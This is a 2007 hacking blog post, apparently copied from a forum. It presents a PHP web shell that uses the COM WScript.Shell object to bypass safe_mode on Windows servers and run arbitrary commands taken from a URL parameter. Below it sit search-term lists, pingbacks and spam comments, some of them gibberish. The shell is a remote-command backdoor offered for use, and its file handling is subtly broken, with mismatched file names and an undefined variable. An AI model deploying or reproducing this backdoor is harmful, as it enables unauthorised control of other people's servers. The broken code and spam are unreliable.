I’ve just found a nice thread on h4cky0u.org forum about bypassing safe-mode ON , on any WINDOWS OS by using php shell which will allow us to execute / inject any command on target machine. This video is presented in Arabic languange , but it’s very easy to understand.
The PHP SHELL code :
<?php
//PHP COM extensions (inconsistent Win32) safe_mode bypass
$____suntzu = new COM(”WScript.Shell”);
$____suntzu->Run(’c:\windows\system32\cmd.exe /c ‘.escapeshellarg($_GET[cmd]).’ > ‘.dirname($_SERVER[SCRIPT_FILENAME]).’/djekmani.txt’);
$____suntzoi=file(”suntzoi.txt”);
for ($i=0; $i<count($____djekmani); $i++) {echo nl2br(htmlentities($____djekmani[$i]));}
// *quote* from the php manual:
// There is no installation needed to use these functions; they are part of the PHP core.
// The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.
// You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
// we don’t and can’t bundle all of those with PHP.
?>
See how it works.
VIDEO How to bypass SAFE-MODE on WINDOWS BOX using php shell is posted on November 12th, 2007 by admin. This post is filed under: Security, video|podcast, Hacking, Hacking Videos, how to, php shells, Security .
Some people come to this post with this search term: bypass safe mode, how to bypass safe mode, bypass safe mode password, Safe Mode Shell , windows php shell, bypassing safe mode , bypass safemode, how to bypass safe mode password, bypass safemode password, bypass safe mode shell, safe mode bypass shell, how to bypass safe_mode, bypass shell, how to bypass safe search, php shell hack, phpshell hack, bypass safe mode login, how to use safe_mode bypass exploit tutorial, how to bypass safemode, windows,
And here is the related entries of this post:
[...] but it’s very easy to understand. The PHP SHELL code : Hacking, Hacking Videos, […] [Read the rest on (it)gossips network: lain] Related Postsphp-findsock-shell : another interesting web backdoorMake Your Own CGIProxy [...]
Great very best
Thx bro
:)
hellow nice job ;
my video in here hhhhhh
thanks man
ysuvrrgdcnhqghzrwell, hi admin adn people nice forum indeed. how’s life? hope it’s introduce branch
hello it is test. WinRAR provides the full RAR and ZIP file support, can decompress CAB, GZIP, ACE and other archive formats.
wpthdckmggxtmsefwumrqgucnipgwrmoaonhello
[...] the internet. Note that the PHP safe_mode must be turned off. Depending on OS and PHP version you can bypass the safe_mode [...]